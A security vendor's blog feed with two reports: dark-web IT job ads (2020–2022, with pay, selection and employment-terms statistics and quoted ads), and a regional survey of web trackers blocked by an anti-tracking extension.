People may have several reasons for going to a dark web site to look for a job. Many are drawn by expectations of easy money and large financial gain. Most times, this is only an illusion. Salaries offered on the dark web are seldom significantly higher than those you can earn legally. Moreover, the level of compensation depends on your experience, talent, and willingness to invest your energy into work. Nevertheless, unhappy with their pay, a substantial percentage of employees in the legitimate economy quit their jobs to find similar employment on the dark web market. Changes on the market, layoffs, and pay cuts, too, often prompt them to look for a job on cybercrime websites.

Other factors include the lack of the usual candidate requirements, such as a higher education, a military service record, the absence of prior convictions, and so on. Legal age is the main requirement that many ads have in common. Dark web jobs look attractive to freelancers and remote workers because there is no office they have to show up in, and they can remain digital nomads. Candidates are attracted by the large degree of freedom offered on the dark web: you can take as many days off as you want, there is no dress code, and you are free to choose any schedule, tasks and scope of work.

Another reason why people look for a job on the dark web is poor awareness of possible consequences or a flippant attitude to those. Working with underground teams, let alone cybercrime groups, poses serious risks: members can be deanonymized and prosecuted, and even getting paid is not a guarantee.

Example of a resume posting

Dark web job market statistics

To analyze the state of the dark web job market in January 2020 through June 2022, we gathered statistics on messages that mentioned employment, posted on 155 dark web forums. Messages were selected from forum sections on any jobs, not necessarily those in IT.

A total of roughly 200,000 employment-related ads were posted on the dark web forums during the period in question. The largest number of these, or 41% of the total, were posted in 2020. Posting activity peaked in March 2020, possibly caused by a pandemic-related income drop experienced by part of the population.

Ad posting statistics by quarter, Q1 2020–Q2 2022 (download)

The impact of the pandemic was especially noticeable on the CIS markets.

The resume of a candidate who has found himself in a pinch (1)

See translation

Guy over 25, no addictions, into sports. Quarantined without cash, looking for rewarding job offers, ready to cooperate.

The resume of a candidate who has found himself in a pinch (2)

Some of those living in the region suffered a reduction in income, were put on mandatory furlough, or lost their jobs altogether, which subsequently resulted in rising unemployment levels (article in Russian).

Tags on an ad offering a job amid the crisis

See translation

how to earn money amid crisis
make some cash during pandemic
make money during coronavirus
coronavirus updates
pandemic jobs
jobs amid crisis

Some jobseekers lost all hope of finding steady, legitimate employment and began to search dark web forums, spawning a surge of resumes there. As a result, March 2020 accounted for the highest number of ads, both from prospective employers and from jobseekers, at 6% of the total.

Posting dynamics on dark web job forums in 2020–2022 (download)

Ads seeking jobs were significantly fewer than those offering them: jobseekers’ postings accounted for just 17% of all the ads we found. The statistics suggest that jobseekers respond to ads posted by prospective employers more often than they post resumes of their own.

Resumes posted on dark web forums target diverse areas of expertise and job descriptions: from moderating Telegram channels to compromising corporate infrastructure. This study focused on IT jobs specifically. We analyzed 867 ads that contained specified keywords, 638 of the ads being vacancy postings and 229 being resumes.

The most in-demand professionals on the dark web were developers: this specialization accounted for 61% of total ads. Attackers (pentesters) were second, with 16%, and designers came third, with 10%.

Distribution of dark web job ads across specializations (download)

Selection criteria

The methods of selecting IT professionals on the dark web market are much the same as those used by legitimate businesses. Employers similarly look for a highly skilled workforce and therefore seek to select the best candidates.

Selection criteria in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated selection criteria (download)

Job postings often mention test assignments, including paid ones, as well as interviews, probation periods, and other selection methods.

Job posting that offers applicants a test assignment

See translation

PM us your resume if you’re interested. We’ll send the suitable candidates a paid test assignment (20,000 rub in BTC at current rate).

One job ad even contained a detailed description of the employee selection process. An applicant had to undergo several rounds of screening, test assignments involving encryption of malware executables and evasion of protective measures, and a probation period.

Example of a candidate selection flow

See translation

Candidate selection procedure:

  1. We give you a test DLL to encrypt. Must be a FUD scantime encrypt with max 3 minor AV runtime detects.
  2. If step 1 completed successfully, you get a live file to encrypt. Must be a FUD scantime encrypt, stay clean for 24 hours (no d/l)
  3. If step 2 completed successfully, we put you on a trial period of two weeks for $40/encrypt. We expect a functional FUD DLL/EXE by 1 PM Moscow time every Monday through Friday.
  4. If trial completed successfully, you were regularly online, doing cleanups, and you showed yourself to be a painstaking and competent professional, we hire you full-time for $800–$1500/week.

The absence of addictions, such as drugs and alcohol, is one of the requirements peculiar to the recruitment process on the dark web.

Job posting saying that only those free from addictions can be selected

See translation

Teamwork skills, stable connection, no alcohol or drug addictions

Employment terms

Employers on the dark web seek to attract applicants by offering favorable terms of employment, among other things. The most frequently mentioned advantages included remote work (45%), full-time employment (34%), and flextime (33%). That being said, remote work is a necessity rather than an attractive offer on the dark web, as anonymity is key in the world of cybercrime. You can also come across paid time off, paid sick leaves, and even a friendly team listed among the terms of employment.

Employment terms in dark web job postings. The percentages presented were calculated out of the total number of ads that clearly stated the terms of employment (download)

Cybercrime groups, which look for the most highly skilled professionals, offer the best terms, including prospects of promotion and incentive plans.

Employment terms in a dark web job posting

See translation

Terms:

  • Paychecks on time. Pay rate ($2000 and up) to be fixed after successful test assignment and interview
  • Fully REMOTE, 5 days/week, Sat and Sun off.
  • PTO
  • NO formal employment contract
  • We offer a continuous increase in pay: with each successful assignment, you get a raise and an instant bonus.

These groups may conduct performance reviews, as Conti did. A review may result in the employee receiving a bonus or being fined for low productivity. On top of that, some underground organizations run employee referral programs that offer bonuses to those who have successfully brought in new workers.

Similarly to the legitimate job market, dark web employers offer various work arrangements: full time, part time, traineeships, business relationships, partnerships, or team membership.

Job posting that suggests cooperation

The absence of a legally executed employment contract is the key differentiator between the dark web and the legitimate job market. This is not to say that you never come across perfectly legal job ads on the dark web. For instance, we discovered several ads seeking a developer for a well-known Russian bank and mentioning a legally executed contract and voluntary health insurance.

Legitimate job ad found on the dark web

See translation
  • Work for a top 50 Russian bank.
  • Formal employment contract
  • VHI starting from first month of employment
  • Work schedule: 5/2, remote work
  • Compensation levels: remote developer in Samara: ₽125,000 gross + 10% annual bonus; onsite developer in Penza: ₽115,000 gross + 10% annual bonus
  • Professional team, friendly environment
  • Challenging task and projects, chance to make a difference

Levels of compensation

We analyzed more than 160 IT job ads that explicitly stated a salary[1]. When reviewing the statistics, it is worth bearing in mind that dark web employers typically state rough salary figures. Many employers provide a pay range or a lower limit.

Job posting that indicates a ballpark level of compensation

Your level of compensation may grow with time depending on how much effort you invest, your contribution, and how successful the business is on the whole. Compensation is typically indicated in dollars, but in practice work is often paid for in cryptocurrency.

The diagram below shows the minimum and maximum levels of compensation for selected IT jobs.

IT pay ranges from dark web job ads (download)

The most highly paid job at the time of the study was coding, commanding a maximum of $20,000 per month. However, the lower limit there was the smallest: just $200.

Example of an offer with the highest salary for developers

The median monthly salary of a reverse engineer was also notably high at $4,000.

Job              | Median monthly salary
Attacker         | $2,500
Developer        | $2,000
Reverse engineer | $4,000
Analyst          | $1,750
IT administrator | $1,500
Tester           | $1,500
Designer         | $1,300

Median monthly IT salaries on the dark web

Some dark web job ads promised levels of compensation much higher than the figures quoted above, but these figures included bonuses and commissions from successful projects, such as extorting a ransom from a compromised organization.

Not every job posting made it into the compensation statistics, as some looked suspicious or openly fraudulent.

For instance, one job ad on the dark web promised a successful pentesting candidate up to $100,000 per month. Interestingly enough, the work was described as “legal.”

Job posting on a dark web forum offering an inflated compensation figure

See translation

search, employee / Seeking website pentesters XXE, XSS, SQL
Looking for a person who knows XXE, XSS, SQL attacks inside and out to pentest our sites for vulnerabilities.
Fully legal
Compensation up to $100,000/mo.
PM for details

Besides the usual hourly, daily, weekly, and monthly rates, there are other forms of compensation that serve as the base pay or complement it. You could also come across job ads that offered payment for completing a specific task: hacking a website or creating a phishing web page.

Various performance-based commissions were often promised in addition to the salary. For example, a pentester could be promised a monthly salary of $10,000 along with a percentage of the profits received from selling access to a compromised organization’s infrastructure or confidential data, extortion, and other ways of monetizing the hack.

Example of a job ad that offered a salary and a performance bonus

See translation

Seeking WIN pentester to join our team.

  1. Experience with Cobalt Strike, MSF, etc. required
  2. Commitment to work is a must
  3. No addictions

Compensation up to $10,000/mo. + bonus.
PM if interested.

Candidates were often offered commission only, and in several cases no compensation of any kind was provided: applicants were invited to work pro bono, for a promised commission, or for a share of future profits.

Example of an unpaid job ad

Takeaways

The dark web is a versatile platform that cybercriminals not only use for striking deals and spreading illegal information, but also for hiring members to their teams and groups.

The data provided in this report shows that demand for IT professionals is fairly high on cybercrime websites, with new team members often being salaried employees. It is interesting, too, that cybercrime communities use the same methods for recruiting new members as legitimate organizations, and job ads they post often resemble those published on regular recruitment sites.

The ads we analyzed also suggest that a substantial number of people are willing to engage in illicit or semilegal activities despite the accompanying risks. In particular, many turn to the shadow market for extra income in a crisis. Thus, the number of resumes on dark web sites surged as the pandemic broke out in March 2020. Although dark web jobs could be expected to pay higher than legitimate ones, we did not detect a significant difference between the median levels of IT professionals’ compensation in the cybercriminal ecosystem and the legitimate job market.

Software development proved to be the most sought-after skill, with 61% of all ads seeking developers. This could suggest that the complexity of cyberattacks is growing. The higher demand for developers could be explained by a need to create and configure new, more complex tools.

It is worth noting that the risks associated with working for a dark web employer still outweigh the benefits. The absence of a legally executed employment contract relieves employers of any responsibility. A worker could be left unpaid, framed or involved in a fraudulent scheme.

The risks of being prosecuted, put on trial and imprisoned for unlawful activities should not be forgotten either. The risks of cooperating with hacker groups are especially high, as deanonymizing their members is a priority for cybercrime investigation teams. The group may be exposed sooner or later, and its members may face jail time.

To inquire about threat monitoring services for your organization, please contact us at dfi@kaspersky.com.

To get the full version of the report, please fill in the form below. If you cannot see the form, try opening this post in Chrome with all script-blocking plugins off.


[1] Salary levels expressed in Russian rubles were converted using the effective rate at the time of the study: 75 rubles per dollar.

Who tracked internet users in 2021–2022 https://securelist.com/tracker-report-2021-2022/108079/ https://securelist.com/tracker-report-2021-2022/108079/#respond Fri, 25 Nov 2022 08:00:07 +0000 https://kasperskycontenthub.com/securelist/?p=108079

Every time you go online, someone is watching over you. The services you use, the websites you visit, the apps on your phone, smart TVs, gaming consoles, and any networked devices collect data on you with the help of trackers installed on web pages or in software. The websites and services send this data to their manufacturers and partners whose trackers they use. Companies are looking for all kinds of information on you: from device specifications to the way you use a service and the pages you open. The data thus collected helps companies, first, to understand their customers better and improve their products by analyzing the user experience and, second, to predict user needs and possibly even manipulate them. Besides, the more an organization knows about you, the better it can personalize the ads it shows you. These ads command higher rates than random ones and therefore generate higher profits.

Understanding who is collecting the data and why requires you to have free time and to know where to look. Most services have published privacy policies, which should ideally explain in detail what data the service collects and why. Sadly, these policies are seldom transparent enough. Worried about this lack of transparency, users and privacy watchdogs put pressure on technology companies. Certain tech giants recently started adding tools to their ecosystems that are meant to improve the data collection transparency. For example, upon the first run of an app downloaded from the App Store, Apple inquires if the user is willing to allow that app to track their activity. However, not every service provides this kind of warnings. You will not see a prompt like that when visiting a website, even if you are doing it on an Apple device.

Browser privacy settings and special extensions that recognize tracking requests from websites and block these can protect you from tracking as you surf the web. That is how our Do Not Track (DNT) extension works. Furthermore, with the user’s consent, DNT collects anonymized data on what tracking requests are being blocked and how frequently. This report will look at companies that collect, analyze, store user data, and share it with partners, as reported by DNT.

Statistics collection principles

This report uses anonymous statistics collected between August 2021 and August 2022 by the Do Not Track component, which blocks loading of web trackers. The statistics consist of anonymized data provided by users voluntarily. We have compiled a list of 25 tracking services that DNT detected most frequently across nine regions and certain individual countries. 100% in each case represents the total number of DNT detections triggered by all 25 tracking services.
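In other words, the percentages below are normalized to the TOP 25 total for a region rather than to all DNT detections. A trivial sketch of that normalization, using made-up detection counts:

# Made-up numbers, for illustration only: shares are computed against the sum of
# detections for the 25 busiest services, so the 25 values add up to 100%.
$detections = @{
    'Google Marketing Platform' = 1520
    'Google Analytics'          = 1010
    'Criteo'                    = 430
    # ...the remaining 22 services for the region
}

$top25Total = ($detections.Values | Measure-Object -Sum).Sum

$detections.GetEnumerator() | Sort-Object Value -Descending | ForEach-Object {
    '{0}: {1:P2}' -f $_.Key, ($_.Value / $top25Total)
}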

DNT (disabled by default) is part of Kaspersky Internet Security, Kaspersky Total Security, and Kaspersky Security Cloud.

Global web tracking giants

Six tracking services made the TOP 25 rankings in each of the regions at hand. Four of them are owned by Google: Google Analytics, Google AdSense, Google Marketing Platform, and YouTube Analytics. The remaining two are owned by Meta and Criteo, which we will cover later.

Google

Our last report, published in 2019, took a close look at Google’s trackers: DoubleClick, Google AdSense, Google Analytics, and YouTube Analytics. This was right around the time when the search giant announced plans to rebrand the DoubleClick advertising platform and merge it with its advertising ecosystem. Today, DoubleClick is part of Google Marketing Platform, although the tracking URLs have not changed and continue to function as before. For convenience, our statistics will refer to that tracking service as “Google Marketing Platform (ex-DoubleClick)”.

Share of DNT detections triggered by Google Marketing Platform (ex-DoubleClick) trackers in each region, August 2021 — August 2022 (download)

Google Marketing Platform (ex-DoubleClick) had its largest shares in our TOP 25 rankings for South Asia (32.92%) and the Middle East (32.84%). These were followed by its shares in Africa and Latin America: 25.37% and 24.64%, respectively. The lowest share (just 7.05%) of Google Marketing Platform (ex-DoubleClick) DNT detections in our regional TOP 25 rankings of the busiest tracking services were observed in the CIS.

A further tracking service operated by Google, Google Analytics, collects data on website visitors and provides detailed statistics to clients. That service, too, accounts for a fairly large share of DNT detections across the world.

Share of DNT detections triggered by Google Analytics trackers in each region, August 2021 — August 2022 (download)

A look at the share of Google Analytics in various regions will reveal a similar pattern to the Google Marketing Platform (ex-DoubleClick). Google Analytics received its largest shares of detections in South Asia (18.04%), Latin America (17.97%), Africa (16.56%) and the Middle East (16.44%). Its smallest share was in the CIS: 9.06%.

Share of DNT detections triggered by Google AdSense trackers in each region, August 2021 — August 2022 (download)

Another tracking system operated by Google is the Google AdSense contextual advertising service. This, again, had its highest percentages in the Middle East (5.27%), Africa (4.63%), Latin America (4.44%), and South Asia (4.44%). Here, too, the CIS ranked last, with just 1.45% of detections triggered by the service.

Rounding out the list of Google’s tracking services is YouTube Analytics. It provides YouTube bloggers with data on their audiences that its trackers collect and analyze.

Share of DNT detections triggered by YouTube Analytics trackers in each region, August 2021 — August 2022 (download)

The Middle East (8.04%), South Asia (7.79%), Africa (5.97%), and Latin America (5.02%) again accounted for the highest shares of detections. At the bottom of the region list this time around is North America (1.82%), rather than the CIS (2.54%). The low percentage is no indication of YouTube’s insignificant presence in the region. The small share of YouTube Analytics in the region was likely due to fierce competition among services that collect and analyze data. We will revisit this later.

Meta (Facebook)

Facebook Custom Audiences by Meta, which provides targeted advertising services, was present in each of the regions along with Google’s tracking services. Services like that collect various types of user data, analyze these, and segment the audience to ensure better ad targeting. An advertiser who uses a targeting service wins by having their products shown to the people who are the likeliest to be interested. Compared to smaller advertising providers, Facebook Custom Audiences covers a significantly larger audience. Our data shows, however, that Meta was second to Google in terms of presence in all regions of the world.

Share of DNT detections triggered by Facebook Custom Audiences trackers in each region, August 2021 — August 2022 (download)

Facebook Custom Audiences had its largest shares in Latin America (8.76%) and Oceania (7.95%), and its smallest, in the CIS (2.12%). As mentioned above, the modest shares occupied by the global trackers could be linked to serious competition from local data collection and analysis services.

Criteo

The last on the list of tracking services detected in every corner of the world was Criteo. Though a less familiar name than Google or Facebook, Criteo actually is a major French advertising company providing a range of services from collection and analysis of user data to advertising itself.

Share of DNT detections triggered by Criteo trackers in each region, August 2021 — August 2022 (download)

Criteo trackers were most frequently detected in Europe (7.07%), East Asia (6.09%), and Latin America (5.24%), and least frequently, in South Asia (just 1.59%).

Regional landscape

In addition to the tracking services detected everywhere in the world, there were players of comparable size that did appear in most, but not all, TOP 25 rankings and local giants that dominated individual regions or countries. We will cover these below.

Europe

The aforementioned global tracking services held the top three places in Europe: Google Marketing Platform (ex-DoubleClick) (21.39%), Google Analytics (15.23%), and Criteo (7.07%). Facebook Custom Audiences was fifth, with 5.29%, Google AdSense was seventh, with 3.59%, and YouTube Analytics eleventh, with 2.97%. Trackers owned by five other major companies occupied the fourth, sixth, eighth, ninth, and tenth positions in our rankings.

TOP 25 tracking services in Europe, August 2021 — August 2022 (download)

Amazon Technologies, which accounted for 6.31% of the total detections associated with prevalent trackers in Europe, stands for trackers operated by Amazon Advertising, an Amazon subsidiary that collects and analyzes user data to help its clients connect with consumers, in addition to placing ads across all Amazon services. It is essentially a classic advertising giant similar to Google Marketing Platform and Criteo. Amazon trackers will come up more than once in other regional TOP 25 rankings.

Index Exchange, a Canada-based global advertising marketplace with a 4.12% share in Europe, is another such giant.

Bing Ads, with a share of 3.45%, was another tracking service popular in the region. It provides search query analysis and displays ads in the Bing search engine. It was followed by Adloox (3.21%), which we covered in the previous review, and Improve Digital (3.17%), a Dutch advertising platform.

Facebook was the fifteenth most popular tracking service in the region, with 1.96%. This is another Meta service, which tracks Facebook account activity, such as logins and interaction with plugins and Like buttons on other websites. The service features in the TOP 25 almost in every region, with the exception of North America, Russia and Iran.

Certain tracking services, such as Meetrics (DoubleVerify), with a share of 1.28%, and Virtual Minds, with a share of 1.39%, feature in the European TOP 25 only. This is hardly surprising, as both companies are headquartered in Germany.

Africa

The familiar advertising giants occupied the top four positions in Africa. Google Marketing Platform (ex-DoubleClick) had a huge share of 25.37%. Google Analytics was second, with 16.56%. YouTube Analytics and Facebook Custom Audiences were detected in 5.97% and 5.90% of total cases, respectively.

TOP 25 tracking services in Africa, August 2021 — August 2022 (download)

The fifth place was taken by Yahoo Web Analytics, with a share of 4.86%. This is a service that collects and analyzes data on Yahoo users. The presence of Yahoo Web Analytics in a regional TOP 25 is an indication that Yahoo services are popular in that region.

It is worth noting that the African TOP 25 included none of the tracking services popular in that region exclusively.

The Middle East

The six global tracking services occupied the top six positions in the Middle East. Google Marketing Platform (ex-DoubleClick) accounted for almost one-third (32.84%) of the total detections of the region’s most popular tracking services. Google Analytics trackers were detected in 16.44% of cases; YouTube Analytics trackers, in 8.04%; аnd Google AdSense trackers, in 5.27%. Google is evidently the biggest collector of user data in the Middle East.

TOP 25 tracking services in the Middle East, August 2021 — August 2022 (download)

There is a certain country in the region whose TOP 25 statistics we would like to consider separately because of a unique advertising market and hence, an online tracking landscape different from the rest of the Middle East.

Iran

Iran is the only country on our list where Google Analytics accounted for 50.72% of the total detections associated with the 25 leading tracking services. Google Marketing Platform (ex-DoubleClick) accounted for 11.76%.

TOP 25 tracking services in Iran, August 2021 — August 2022 (download)

Iran also has local tracking services that internet users there encounter fairly often. For instance, the advertising agency SabaVision, with a share of 4.62%, was third in the rankings and the advertising platform Yektan was fifth, with 3.90%.

Latin America

The tracking landscape in Latin America was not drastically different from the rest of the world. Again, Google, Facebook, and Criteo occupied the leading positions. They were followed by Yahoo Web Analytics (3.48%), trackers operated by the US analytics company Chartbeat (3.00%), Twitter (2.65%), and Amazon Technologies (2.62%).

TOP 25 tracking services in Latin America, August 2021 — August 2022 (download)

North America

The share of Google’s global tracking services was comparatively small in North America, as the charts in the first part of this report show. Google Marketing Platform (ex-DoubleClick) accounted for 18.22% of total detections in August 2021 — August 2022, which was the second smallest figure in terms of its regional shares. The North American share of YouTube Analytics trackers was their smallest altogether. This was due to the heavy presence of trackers operated by other companies: Amazon Technologies (6.90%), Yahoo Web Analytics (5.67%), and Adloox (5.57%). These companies created a more competitive environment, which resulted in the share of each tracking service in the total DNT detections being smaller.

TOP 25 tracking services in North America, August 2021 — August 2022 (download)

In addition to other regions’ leaders, the North American TOP 25 featured a few that only made the local rankings. Examples included the Canadian advertising ecosystem Sharethrough with a share of 1.99% and the American advertising company The Trade Desk, which accounted for 1.65% of the detections.

Oceania

Every well-known global web tracking service was represented in Oceania. Interestingly enough, Oceania and North America were the only two regions where trackers by Tremor Video, a company that specializes in video advertising, made their way into the TOP 25, with the shares of 1.15% and 2.54%, respectively.

TOP 25 tracking services in Oceania, August 2021 — August 2022 (download)

The CIS

The CIS (Commonwealth of Independent States) is a fairly interesting region that has a variety of local tracking services. It comprises diverse countries, each with its distinctive internet regulations and restrictions, which certainly affects the presence of advertising companies. We will start by looking at the aggregate statistics for the CIS exclusive of Russia, as that country dominates the market, distorting other countries’ statistical data somewhat.

TOP 25 tracking services in the CIS (excluding Russia), August 2021 — August 2022 (download)

The CIS was the only region at hand dominated by a local internet giant, rather than the Google Marketing Platform (ex-DoubleClick). Yandex.Metrika, with a share of 19.24%, topped the rankings of trackers popular in the region. Google’s tracking services occupied second (16.17%) and third (13.14%) places.

The Mediascope research company was fourth, with 5.55%. Besides collecting and analyzing user data for marketing purposes, Mediascope is the organization officially designated to measure the size of television channel audiences and to report to Roskomnadzor, Russia’s mass media regulator.

Other tracking services specific to the CIS are the web counter Yadro.ru (4.88%), the ad management platform AdFox (4.68%), Russian ad tech company Buzzoola (3.03%), the ad management and audit service Adriver (2.74%), Between Digital (2.23%), Rambler Internet Holdings (1.95%), VK (ex-Mail.Ru Group, 1.92%), VKontakte (1.86%), AdMixer (1.70%), originally from Russia but now headquartered in London, and Uniontraff.com (1.03%).

Thus, 12 out of 25 most widely used web tracking services in the CIS (exclusive of Russia) were endemic to the market.

Russian Federation

Most of the tracking services that made the TOP 25 in Russia are homegrown. Yandex.Metrika and Mediascope, mentioned above, were first and second, respectively, with 19.73% and 12.51%. Google Analytics (8.83%) and Google Marketing Platform (ex-DoubleClick, 6.59%) occupied the third and fourth positions, their respective shares fairly low in comparison to the Russia-less CIS average of 13.14% and 16.17% respectively. The rest of the top positions went to local Russian tracking services.

TOP 25 tracking services in Russia, August 2021 — August 2022 (download)

East Asia

The East Asian landscape did not differ drastically from the rest of the world. It featured mostly the same tracking services as other parts of the globe. However, there were two exceptions: Japan and Korea. We singled out these countries as separate research entities to demonstrate their distinctive features and the maturity of local advertising companies, which were, by and large, the key user data collectors and analysts there.

Google Marketing Platform (ex-DoubleClick) featured quite prominently in the East Asian TOP 25 rankings with a 27.62% share, followed by Google Analytics (16.13%) and Facebook Custom Audiences (6.65%). YouTube Analytics had a share of 6.54%, and Yahoo Web Analytics, 5.79%.

TOP 25 tracking services in East Asia (excluding Japan and Korea), August 2021 — August 2022 (download)

Japan

Japan is the only country where Twitter trackers had a fairly high share (11.67%), overtaking both Facebook Custom Audiences (4.43%) and YouTube Analytics (3.24%). Similarly to other major social networks, Twitter tracks user activity on other websites in addition to its own. One of the tracking tools is Twitter Pixel, which owners can embed into their websites. Twitter trackers notably featured in the TOP 25 rankings of every region and country covered by the report, with the exception of Russia, where this service is blocked.

TOP 25 tracking services in Japan, August 2021 — August 2022 (download)

In addition to the global companies, the TOP 25 rankings for Japan featured local tracking services. Examples include trackers operated by Japanese marketing and advertising agencies such as Digital Advertising Consortium Inc (3.01%), Supership (2.86%), I-mobile (2.13%), AdStir (1.44%), Samurai Factory (0.99%) and Logly (0.90%), the blogging platform Ameba (1.47%), and the online services vendor LINE Corporation (0.71%).

South Korea

Like Japan, South Korea is a distinctive market with mature local tech companies, which affects tracker distribution. Google led by a fairly wide margin: Google Marketing Platform (ex-DoubleClick) had a share of 25.49%, and Google Analytics, 19.74%. Trackers operated by Kakao, Korea’s largest internet company, accounted for as much as 10.90%, pushing it to third place. Kakao’s scale of operations is comparable to that of Japan’s LINE, Russia’s Yandex or China’s WeChat.

TOP 25 tracking services in South Korea, August 2021 — August 2022 (download)

Other Korean tracking services in the TOP 25 were eBay Korea (2.02%) and the targeted advertising service WiderPlanet (1.77%).

South Asia

The South Asian TOP 25 rankings of web tracking services most frequently detected by DNT looked similar to the general global pattern. As in the Middle East, Google Marketing Platform (ex-DoubleClick) had one of the highest shares globally in South Asia, 32.92%.

TOP 25 tracking services in South Asia, August 2021 — August 2022 (download)

The Indian tech and media giant Times Internet, which was not part of the TOP 25 in any other region of the world, had some presence in South Asia (0.97%).

Conclusion

There are only a few global companies that collect user data in every corner of the world. They are the universally recognized Google and Meta, as well as the advertising giant Criteo, little known to common users. We have seen that the more distinctive the region or country is linguistically, economically, and technologically, the higher the chances are that local companies will have some presence on the market and be able to compete with the global giants. Major local players typically go beyond just advertising and marketing to be providers of diverse online services on their home markets. For example, Korea’s Kakao, Japan’s LINE, and Russia’s Yandex are not just internet giants but key regional services that provide the population with all that it needs: from email and instant messaging to food delivery. As they collect and analyze user data, they naturally pursue the same objectives as the global giants.

Being aware that your online activity is tracked is no fun. Unfortunately, you cannot fully protect yourself against tracking — you can only minimize the amount of data that a company tracking you will obtain. That is also important, though: the less information on you is collected beyond your control, the less painful potential future leakages would be. There are various types of technical tools to protect you from web tracking. For instance, VPN changes your IP address, thus distorting to a degree the digital profile of you that marketing companies strive to build. Anti-tracking browser extensions like DNT block trackers while you surf the web, preventing companies from finding out what websites you use and how. You can also reduce the risk by sharing only the data that services need to function. That will not stop them from collecting your data, but it can significantly reduce the scope of the information that companies have about you.
